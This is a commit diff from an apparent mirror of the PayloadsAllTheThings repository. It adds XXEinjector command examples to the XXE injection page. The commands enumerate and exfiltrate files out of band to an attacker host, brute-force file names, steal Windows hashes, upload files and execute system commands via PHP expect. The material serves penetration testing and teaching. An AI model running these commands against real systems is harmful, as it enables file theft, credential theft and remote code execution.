mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
add XXEinjector
This commit is contained in:
parent
5094ef8b10
commit
52119907f6
@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
```
|
||||
$ python3 230.py 2121
|
||||
```
|
||||
|
||||
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||
```bash
|
||||
# Enumerating /etc directory in HTTPS application:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||
# Enumerating /etc directory using gopher for OOB method:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||
# Second order exploitation:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||
# Enumerating using direct exploitation:
|
||||
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||
# Enumerating unfiltered ports:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||
# Stealing Windows hashes:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||
# Uploading files using Java jar:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||
# Executing system commands using PHP expect:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||
# Testing for XSLT injection:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||
# Log requests only:
|
||||
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||
```
|
||||
|
||||
## Detect the vulnerability
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user